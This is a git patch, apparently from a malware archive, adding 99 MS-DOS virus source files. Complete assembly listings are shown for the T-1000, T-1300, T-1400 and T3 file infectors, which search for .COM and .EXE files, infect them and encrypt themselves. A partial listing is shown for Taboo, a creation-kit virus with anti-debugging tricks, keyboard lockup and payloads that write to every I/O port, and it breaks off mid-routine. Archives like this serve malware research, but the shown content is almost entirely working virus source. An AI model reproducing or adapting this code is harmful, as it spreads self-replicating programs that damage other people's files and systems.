From 3e7d2e8262873efbbdf0b961cb116fd292fae079 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 18:01:59 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.t-1000.asm | 95 + MSDOS/Virus.MSDOS.Unknown.t-1300.asm | 79 + MSDOS/Virus.MSDOS.Unknown.t-1400.asm | 143 + MSDOS/Virus.MSDOS.Unknown.t3.asm | 361 ++ MSDOS/Virus.MSDOS.Unknown.taboo.asm | 539 +++ MSDOS/Virus.MSDOS.Unknown.target.asm | 313 ++ MSDOS/Virus.MSDOS.Unknown.taurus.asm | 378 ++ MSDOS/Virus.MSDOS.Unknown.taz-1973.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.taz-2197.asm | 276 ++ MSDOS/Virus.MSDOS.Unknown.taz-2208.asm | 240 ++ MSDOS/Virus.MSDOS.Unknown.taz-2209.asm | 238 ++ MSDOS/Virus.MSDOS.Unknown.taz-2276.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.taz12.asm | 252 ++ MSDOS/Virus.MSDOS.Unknown.tboot.asm | 171 + MSDOS/Virus.MSDOS.Unknown.tbyte.asm | 612 +++ MSDOS/Virus.MSDOS.Unknown.tce.asm | 862 +++++ MSDOS/Virus.MSDOS.Unknown.tenbytes.asm | 826 ++++ MSDOS/Virus.MSDOS.Unknown.tequila.asm | 1089 ++++++ MSDOS/Virus.MSDOS.Unknown.terror.asm | 492 +++ MSDOS/Virus.MSDOS.Unknown.test1.asm | 379 ++ MSDOS/Virus.MSDOS.Unknown.test2.asm | 303 ++ MSDOS/Virus.MSDOS.Unknown.test3.asm | 318 ++ MSDOS/Virus.MSDOS.Unknown.thief.asm | 269 ++ MSDOS/Virus.MSDOS.Unknown.thunder.a86 | 403 ++ MSDOS/Virus.MSDOS.Unknown.thunder.asm | 403 ++ MSDOS/Virus.MSDOS.Unknown.time.asm | 785 ++++ MSDOS/Virus.MSDOS.Unknown.timebomb.asm | 472 +++ MSDOS/Virus.MSDOS.Unknown.timebomb.doc | 19 + MSDOS/Virus.MSDOS.Unknown.timer.asm | 141 + MSDOS/Virus.MSDOS.Unknown.timid.asm | 195 + MSDOS/Virus.MSDOS.Unknown.timid1.asm | 210 ++ MSDOS/Virus.MSDOS.Unknown.tiny-133.asm | 81 + MSDOS/Virus.MSDOS.Unknown.tiny-134.asm | 162 + MSDOS/Virus.MSDOS.Unknown.tiny-138.asm | 168 + MSDOS/Virus.MSDOS.Unknown.tiny-143.asm | 174 + MSDOS/Virus.MSDOS.Unknown.tiny-154.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny-156.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny-158.asm | 178 + MSDOS/Virus.MSDOS.Unknown.tiny-159.asm | 178 + MSDOS/Virus.MSDOS.Unknown.tiny-160.asm | 178 + MSDOS/Virus.MSDOS.Unknown.tiny-163.asm | 126 + MSDOS/Virus.MSDOS.Unknown.tiny-167.asm | 177 + MSDOS/Virus.MSDOS.Unknown.tiny-198.asm | 199 + MSDOS/Virus.MSDOS.Unknown.tiny-b.asm | 102 + MSDOS/Virus.MSDOS.Unknown.tiny-c.asm | 101 + MSDOS/Virus.MSDOS.Unknown.tiny-f.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny.asm | 120 + MSDOS/Virus.MSDOS.Unknown.tiny133.asm | 94 + MSDOS/Virus.MSDOS.Unknown.tinyd.asm | 116 + MSDOS/Virus.MSDOS.Unknown.tit.asm | 310 ++ MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm | 4787 ++++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.tmc_b.asm | 4284 +++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.tony-f.asm | 201 + MSDOS/Virus.MSDOS.Unknown.torero.asm | 570 +++ MSDOS/Virus.MSDOS.Unknown.torm-205.asm | 158 + MSDOS/Virus.MSDOS.Unknown.torm-358.asm | 160 + MSDOS/Virus.MSDOS.Unknown.torment.asm | 543 +++ MSDOS/Virus.MSDOS.Unknown.totoro.asm | 713 ++++ MSDOS/Virus.MSDOS.Unknown.toys.asm | 381 ++ MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm | 101 + MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm | 1028 +++++ MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm | 990 +++++ MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm | 1009 +++++ MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm | 1028 +++++ MSDOS/Virus.MSDOS.Unknown.tracebck.asm | 1303 +++++++ MSDOS/Virus.MSDOS.Unknown.trash.asm | 169 + MSDOS/Virus.MSDOS.Unknown.trekwar.asm | 185 + MSDOS/Virus.MSDOS.Unknown.tremor.asm | 2266 +++++++++++ MSDOS/Virus.MSDOS.Unknown.trick446.asm | 255 ++ MSDOS/Virus.MSDOS.Unknown.trigger.asm | 500 +++ MSDOS/Virus.MSDOS.Unknown.triv22.asm | 17 + MSDOS/Virus.MSDOS.Unknown.trojan.asm | 69 + MSDOS/Virus.MSDOS.Unknown.tsd1.asm | 260 ++ MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm | 166 + MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm | 322 ++ MSDOS/Virus.MSDOS.Unknown.tsr.asm | 307 ++ MSDOS/Virus.MSDOS.Unknown.tsres.asm | 296 ++ MSDOS/Virus.MSDOS.Unknown.turbo.asm | 324 ++ MSDOS/Virus.MSDOS.Unknown.turbo99.asm | 426 +++ MSDOS/Virus.MSDOS.Unknown.turbo99.lst | 426 +++ MSDOS/Virus.MSDOS.Unknown.turtle.asm | 590 +++ MSDOS/Virus.MSDOS.Unknown.tw.asm | 407 ++ MSDOS/Virus.MSDOS.Unknown.twelve.asm | 302 ++ MSDOS/Virus.MSDOS.Unknown.twer_com.asm | 59 + MSDOS/Virus.MSDOS.Unknown.typo.asm | 433 +++ MSDOS/Virus.MSDOS.Unknown.ultimute.asm | 584 +++ MSDOS/Virus.MSDOS.Unknown.undr.asm | 126 + MSDOS/Virus.MSDOS.Unknown.unevie.asm | 473 +++ MSDOS/Virus.MSDOS.Unknown.unix.txt | 63 + MSDOS/Virus.MSDOS.Unknown.ussr516.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.ussr707.asm | 408 ++ MSDOS/Virus.MSDOS.Unknown.ussr711.asm | 384 ++ MSDOS/Virus.MSDOS.Unknown.utility.asm | 33 + MSDOS/Virus.MSDOS.Unknown.v_582.asm | 324 ++ MSDOS/Virus.MSDOS.Unknown.v_822.asm | 669 ++++ MSDOS/Virus.MSDOS.Unknown.v_822.lst | 669 ++++ MSDOS/Virus.MSDOS.Unknown.v_dos625.asm | 571 +++ MSDOS/Virus.MSDOS.Unknown.v_dos625.lst | 571 +++ MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm | 533 +++ 99 files changed, 45150 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1000.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1300.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1400.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taboo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.target.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taurus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-1973.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2197.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2208.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2209.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2276.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tboot.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tbyte.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tce.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tenbytes.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tequila.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.terror.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.test1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.test2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.test3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.thief.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.thunder.a86 create mode 100644 MSDOS/Virus.MSDOS.Unknown.thunder.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.time.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timebomb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timebomb.doc create mode 100644 MSDOS/Virus.MSDOS.Unknown.timer.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timid.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timid1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-134.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-138.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-143.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-154.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-156.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-158.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-159.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-160.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-163.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-167.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-198.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-f.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tinyd.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tit.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tmc_b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tony-f.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torero.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torm-205.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torm-358.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torment.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.totoro.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.toys.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tracebck.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trash.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trekwar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tremor.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trick446.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trigger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.triv22.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trojan.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsd1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsres.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo99.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo99.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.turtle.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tw.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.twelve.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.twer_com.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.typo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ultimute.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.undr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.unevie.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.unix.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.ussr516.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ussr707.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ussr711.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.utility.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_582.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_822.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_822.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dos625.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dos625.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1000.asm b/MSDOS/Virus.MSDOS.Unknown.t-1000.asm new file mode 100644 index 00000000..a1780180 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1000.asm @@ -0,0 +1,95 @@ +; +; T-1000 Virus +; +; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector. +; When an infected program is started, the virus will infect all files in the +; current directory and use the time counter for its encryption. It displays +; the text "T-1000" when it is ready infecting. + +Code Segment para 'code' + Assume Cs:Code,Ds:Code + +Length Equ Offset EndByte-Offset Main + + Org 100h + +Main: Mov Si,Offset Decrypt + Mov Di,Si + Mov Cl,Offset EndByte-Offset Decrypt +On2: Lodsb + Db 34h +Crypt Db 0 + Stosb + Dec Cl + Cmp Cl,0ffh + Jne On2 + +Decrypt: + Mov Ah,4eh + Push Ax + +Encr: + Mov Ah,2ch + Int 21h + Mov Crypt,Dl + Mov Si,Offset Decrypt + Mov Di,Offset EndByte+10 + Mov Cx,Offset EndByte-Offset Decrypt +On3: Lodsb + Xor Al,Crypt + Stosb + Dec Cx + Cmp Cx,0ffffh + Jne On3 + + Pop Ax +On1: Xor Cx,Cx + Mov Dx,Offset Nam + Int 21h + Jc Einde + + Mov Ax,3d01h + Mov Dx,9eh + Int 21h + Mov Bx,Ax + + Mov Ah,40h + Push Ax + Mov Cx,Offset Decrypt-Offset Main + Mov Dx,Offset Main + Int 21h + + Pop Ax + Mov Cx,Offset EndByte-Offset Decrypt + Mov Dx,Offset EndByte+10 + Int 21h + + Mov Ah,3eh + Int 21h + + Mov Ah,4fh + Push Ax + Jmp Short Encr + +Einde: + Mov Ah,9 + Mov Dx,Offset Msg + Push Cs + Pop Ds + Int 21h + Int 20h + +Msg Db 'T-1000$' + +Nam Db '*.Com',0 + +EndByte Db 0 + +Code Ends + End Main + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1300.asm b/MSDOS/Virus.MSDOS.Unknown.t-1300.asm new file mode 100644 index 00000000..76e1e7ff --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1300.asm @@ -0,0 +1,79 @@ +; +; T-1300 Virus +; +; This is a non-resident overwriting self-encrypting semi-mutating .exe file +; infector. When an infected program is run, the virus will infect all the +; file in the current directory and displays "T-1300" when finished with +; infecting. This is a bit more advanced virus than "T-1000" and a wildcard +; scanstring is needed to find this virus. +; +S_1: Lea Si,Main + Mov Cx,MainLen +Length Equ $-2 +Decrypt: Xor B [Si],0 +CryptByte Equ $-1 +S_2 Equ $-2 +S_3: Inc Si +S_4: Loop Decrypt +CryptLen Equ $-S_1 +Main: Mov Ah,4eh +SeekNext: Lea Dx,FileSpec + Xor Cx,Cx + Int 21h + Jc Einde + Mov Ax,3d02h + Mov Dx,09eh + Int 21h + Xchg Ax,Bx + Mov Ds,Cx + Inc Cx + Mov Ah,B Ds:[46ch] + Mov Ds,Cs + Mov B CryptByte,Ah + Test Ah,1 + Jne NoReg + Xor B S_1,Cl + Xor B S_2,Cl + Xor B S_3,Cl +NoReg: Test Ah,2 + Jne NoXor + Xor B Decrypt,2 +NoXor: Test Ah,4 + Jne NoLoop + Xor B S_4,2 +NoLoop: Lea Si,Main + Lea Di,CryptPart + Mov Cx,MainLen + Push Cx +CodeIt: Lodsb + Xor Al,Ah + Stosb + Loop CodeIt + Pop Cx + And Ax,03fffh + Add Cx,Ax + Mov W Length,Cx + Mov Ah,40h + Lea Dx,S_1 + Mov Cx,CryptLen + Int 21h + Mov Ah,40h + Lea Dx,CryptPart + Mov Cx,MainLen + Int 21h + Mov Ah,3eh + Int 21h + Mov Ah,4fh + Jmp SeekNext +Einde: Mov Ah,9 + Lea Dx,Msg + Int 21h + Ret + +FileSpec Db '*.EXE',0 + +Msg Db 'T-1300$' + +MainLen Equ $-Main + +CryptPart Equ $ diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1400.asm b/MSDOS/Virus.MSDOS.Unknown.t-1400.asm new file mode 100644 index 00000000..dd59f905 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1400.asm @@ -0,0 +1,143 @@ +; +; T-1400 Virus +; +; This is a non-resident overwriting self-encrypting semi-mutating .COM file +; infector. When an infected program is run, the virus will infect all the +; file in the current directory and displays a TridenT logo when finished with +; infecting. This is a bit more advanced virus than "T-1300" and a wildcard +; scanstring is needed to find this virus. It now utilizes three types of +; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and +; SBB. the increment SI has now a new +; possibility, CMPSB. +; +Beg: + Mov Cx,MainLen +Length Equ $-2 +S_1: Lea Si,Main +Zaken: Clc +Decrypt: Xor B [Si],0 +CryptByte Equ $-1 +S_2 Equ $-2 +S_3: Inc Si +S_4: Loop Zaken +CryptLen Equ $-Beg +Main: Mov Ah,4eh +SeekNext: Lea Dx,FileSpec + Xor Cx,Cx + Int 21h + Jnc Yup + Jmp Einde +Yup: Mov Ax,3d02h + Mov Dx,09eh + Int 21h + Xchg Ax,Bx + Mov Ds,Cx + Inc Cx + Mov Ax,W Ds:[46ch] + + Mov Ds,Cs + Mov B CryptByte,Ah + Mov B Zaken,0f8h + + Mov B What,1 + Mov B S_2,34h + Test Al,1 + Jne NotXor + Test Al,32 + Jne Done + Xor B Zaken,1 + Jmp Done +NotXor: Mov B What,2 + Mov B S_2,04h + Test Al,2 + Je Done + Test Al,4 + Je ItsAdc + Mov B What,3 + Mov B S_2,2ch + Test Al,8 + Je Done + Sub B S_2,20h +ItsAdc: Add B S_2,10h +Done: Mov B S_1,0beh + Cmp Ah,80h + Ja NoCMPSB + Mov B S_3,0A6h + Jmp Next +NoCMPSB: Mov B S_3,46h +Next: Test Ah,1 + Jne NoReg + Xor B S_1,Cl + Xor B S_2,Cl + Cmp Ah,80h + Jbe NoReg + Xor B S_3,Cl +NoReg: Test Ah,2 + Jne NoXor + Xor B Decrypt,2 +NoXor: Test Ah,4 + Jne NoLoop + Xor B S_4,2 +NoLoop: Test Ah,8 + Jne Ok + Mov B S_4,0E2h +Ok: Lea Si,Main + Lea Di,CryptPart + Mov Cx,MainLen + Push Cx +CodeIt: Lodsb + Cmp B What,1 + Jne NeXor + Xor Al,Ah + Jmp Stor +NeXor: Cmp B What,2 + Jne NeSub + Sub Al,Ah + Jmp Stor +NeSub: Add Al,Ah +Stor: Stosb + Loop CodeIt + Pop Cx + And Ax,03fffh + Add Cx,Ax + Mov W Length,Cx + Mov Ah,40h + Lea Dx,Beg + Mov Cx,CryptLen + Int 21h + Mov Ah,40h + Lea Dx,CryptPart + Mov Cx,MainLen + Int 21h + Mov Ah,3eh + Int 21h + Mov Ah,4fh + Jmp SeekNext +What Db 0 +Einde: + Mov Al,3 + Int 10h + Lea Si,Y + R: Lodsb + Mov Cl,8 + C: Rol Al,1 + Push Ax + Mov Al,32 + If C Mov Al,219 + Int 29h + Int 29h + Pop Ax + Loop C + Cmp Si,E + Jne R + Ret + Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68 + E: + +FileSpec Db '*.COM',0 + +Msg Db 'T-1400' + +MainLen Equ $-Main + +CryptPart Equ $ diff --git a/MSDOS/Virus.MSDOS.Unknown.t3.asm b/MSDOS/Virus.MSDOS.Unknown.t3.asm new file mode 100644 index 00000000..b6c0dc6c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t3.asm @@ -0,0 +1,361 @@ +;LiquidCode --- T3 +; +; Virus +;This version: +;Searches current directory for non-infected com files, if any found +;it will become infected! +;This virus has a routine which self-destructs itself and uninfects +;the file. + assume cs:code + .286 +code segment "code" + org 0100h +start proc + jmp v_start ;first 5 bytes | + nop ; | + nop ; | +v_start: + call $+3 ;Actual virus + pop dx + sub dx, 3 + push dx ;save relocation factor in BP + pop bp ;so virus can be copied anywhere twoards + mov si, dx ;the end of the file + ; +; Replace first 5 bytes in memory with original +; program code so normal program can run later + add si, first_five + mov di, 0100h + mov cx, 5 + lodsb + stosb + loop $-2 +;see if user want to disinfect this file +; mov si, 82h +; lodsb +; cmp al, "[" ;is al the code to disinfect? "[" +; jne ok_dont_disinfect +; jmp self_kill +ok_dont_disinfect: + ;here should be date checks to see + ;if an evil function should be unleashed!! + mov ah, 2ah + int 21h + ;cx year 1980-2099 + ;dh month 1-12 + ;dl day + ;al day of week 0=sun 1=mon -> 7=sat + cmp dh, 12 + jne notdec + cmp dl, 25 + jne notdec + jmp christmas +notdec: + cmp dh, 4 + jne notapril + cmp dl, 1 + jne notapril +; jmp aprilfools +notapril: + +;Set the DTA + call set_dta + ;find first file to ?infect? + call find_first_file +go_again: + mov si, bp + add si, size_ + lodsw + cmp ax, 5 + ja gd4 + jmp resrch +gd4: + call open_file + mov bx, ax + mov al, 0 + call date_time + mov ah, 3fh + mov cx, 5 + mov dx, bp + add dx, first_five + int 21h +;**** mov ax, 4202h + mov cx, 0 + mov ax, 4202h + mov dx, cx + int 21h + sub ax, 3 + mov si, bp + add si, new_5 + mov [si+1], ax + mov si, bp + mov di, si + add si, chkmark + add di, mark + mov cx, 2 + repe cmpsb + jne INFECT +;File found was previously infected! +; search for new one now. + jmp resrch + +wipe_name: + push di + push ax + push cx + mov di, bp + add di, name_ + mov cx, 13 + mov al, 0 + rep stosb + pop cx + pop ax + pop di + ret +resrch: + call wipe_name + mov ah, 4fh + int 21h + jnc gd3 + jmp term_virus +gd3: + jmp go_again +INFECT: +;Time to infect the file!! + mov si, bp + add si, handle + mov bx, [si] + mov cx, vsize + mov dx, bp + call wipe_name + mov ax, 4000h + int 21h + mov ax, 4200h + mov cx, 0 + mov dx, cx + int 21h + mov dx, bp + add dx, new_5 + mov ax, 4000h + mov cx, 5 + int 21h + mov al, 1 + call date_time + mov ax, 3e00h + int 21h + jmp resrch + +fndnam proc + mov si, env + mov ax, [si] + mov es, ax + mov ds, ax + mov si, 0 + mov di, si +__lp: + lodsb + cmp al, 0 + je chknxt + stosb + jmp __lp +chknxt: + stosb + lodsb + cmp al, 0 + je fnd1 + stosb + jmp __lp +fnd1: + stosb +__lp2: + lodsb + cmp al, "a" + jae ff_ +up2: + cmp al, "A" + jae fff_ +up3: + stosb + jmp __lp2 +ff_: + cmp al,"z" + jbe fnd + jmp up2 +fff_: + cmp al, "Z" + jbe fnd + jmp up3 +fnd: + mov si, di + mov al, 0 + repne scasb + mov dx, si + mov di, dx + ret +env equ 2ch +fndnam endp + + +self_kill: + ;this procedure disinfects specified files + ;SI points to the name of current file on disk + ;which is infected + call fndnam ;find name of current file from env block in memory + jmp gd__ +abrt: + int 20h +gd__: + mov ax, 3d02h + int 21h + jc abrt + mov bx, ax + mov ax, cs + mov ds, ax + mov es, ax + mov cx, 5 + mov dx, bp + add dx, first_five + call wipe_name + mov ax, 4000h + int 21h + jc abrt + mov dx, 0 + mov cx, 0 + mov ax, 4202h + int 21h + jnc gd__1 + jmp abrt +gd__1: + sub ax, vsize + mov dx, ax + mov cx, 0 + mov ax, 4200h + int 21h + call wipe_name + mov cx, 0 + mov ax, 4000h + int 21h + mov ax, 3e00h + int 21h + jmp term_virus +date_time: + pusha + mov ah, 57h + cmp al, 0 + je fnd__$ + mov di, bp + mov si, di + add di, date + add si, time + mov dx, [di] + mov cx, [si] + int 21h + jmp ret__ +fnd__$: + int 21h + mov si, bp + mov di, bp + add si, time + add di, date + mov [si], cx + mov [di], dx +ret__: + popa + ret +open_file: + mov dx, bp + add dx, name_ + mov ax, 3d02h + int 21h + jnc gd2 + jmp term_virus +gd2: + mov si, bp + add si, handle + mov [si], ax + ret +find_first_file: + mov dx, bp + mov cx, 0 + mov ah, 4eh + add dx, all_com_files + int 21h + jnc gd1 + jmp term_virus +gd1: + ret +set_dta: + mov dx, bp + mov ah, 1ah + add dx, dta + int 21h + ret +term_virus: + mov ax, 0 + mov bx, ax + mov cx, bx + mov dx, cx + mov si, 0100h + mov di, -1 + mov bp, di + push 0100h + ret + +CHRISTMAS: +;Program Lockup +; Exit without running program + int 20h +;APRILFOOLS: +;Ha Ha delete current file +; call fndnam +; mov ah, 41h +; int 21h +; mov ax, cs +; mov ds, ax +; mov es, ax +; jmp term_virus +; Data Bank +_fstfive: + int 20h + nop +ckmrk: + nop + nop +acf db "*.COM",0 +dt_ dw 0 +tme dw 0 +d_t_a: + rfd db 21 dup (0) + att db 0 + dw 0 + dw 0 + sz dd 0 + n_me db 13 dup (0),0 +handl dw 0 +nw_5 db 0e9h,0,0 +mrk db " " +strain db "LiquidCode 92" +; +end___: +first_five = offset _fstfive-0105h +all_com_files = offset acf-0105h +dta = offset d_t_a-0105h +attribute = offset att-0105h +time = offset tme-0105h +date = offset dt_-0105h +size_ = offset sz-0105h +name_ = offset n_me-0105h +handle = offset handl-0105h +new_5 = offset nw_5-0105h +mark = offset mrk-0105h +chkmark = offset ckmrk-0105h +vsize = offset end___-0105h +start endp +code ends + end start +  +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.taboo.asm b/MSDOS/Virus.MSDOS.Unknown.taboo.asm new file mode 100644 index 00000000..015cc6ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taboo.asm @@ -0,0 +1,539 @@ +; TABOO.ASM -- Taboo Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Virucidal Maniac + +virus_type equ 2 ; Spawning Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + + mov ah,04Ah ; DOS resize memory function + mov bx,(finish - start) / 16 + 0272h ; BX holds # of para. + int 021h + + mov sp,(finish - start) + 01100h ; Change top of stack + + mov si,offset spawn_name ; SI points to true filename + int 02Eh ; DOS execution back-door + push ax ; Save return value for later + + mov ax,cs ; AX holds code segment + mov ds,ax ; Restore data segment + mov es,ax ; Restore extra segment + + mov cx,0003h ; Do 3 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + xor ah,ah ; BIOS get time function + int 01Ah + test dx,0001h ; Is timer divisible by 2? + jne no_infection ; If not then don't spread + call search_files ; Find and infect a file +no_infection: + call get_day + cmp ax,000Fh ; Did the function return 15? + je strt00 ; If equal, do effect + call get_cpu + cmp ax,01E6h ; Did the function return 486? + je strt00 ; If equal, do effect + jmp end00 ; Otherwise skip over it +strt00: xor ah,ah ; BIOS get time function + int 1Ah + xchg dx,ax ; AX holds low word of timer + mov dx,0FFh ; Start with port 255 +out_loop: out dx,al ; OUT a value to the port + dec dx ; Do the next port + jne out_loop ; Repeat until DX = 0 + +end00: call get_minute + cmp ax,001Eh ; Did the function return 30? + jg strt01 ; If greater, do effect + jmp end01 ; Otherwise skip over it +strt01: mov cx,000Ah ; First argument is 10 +new_shot: push cx ; Save the current count + mov dx,0140h ; DX holds pitch + mov bx,0100h ; BX holds shot duration + in al,061h ; Read the speaker port + and al,11111100b ; Turn off the speaker bit +fire_shot: xor al,2 ; Toggle the 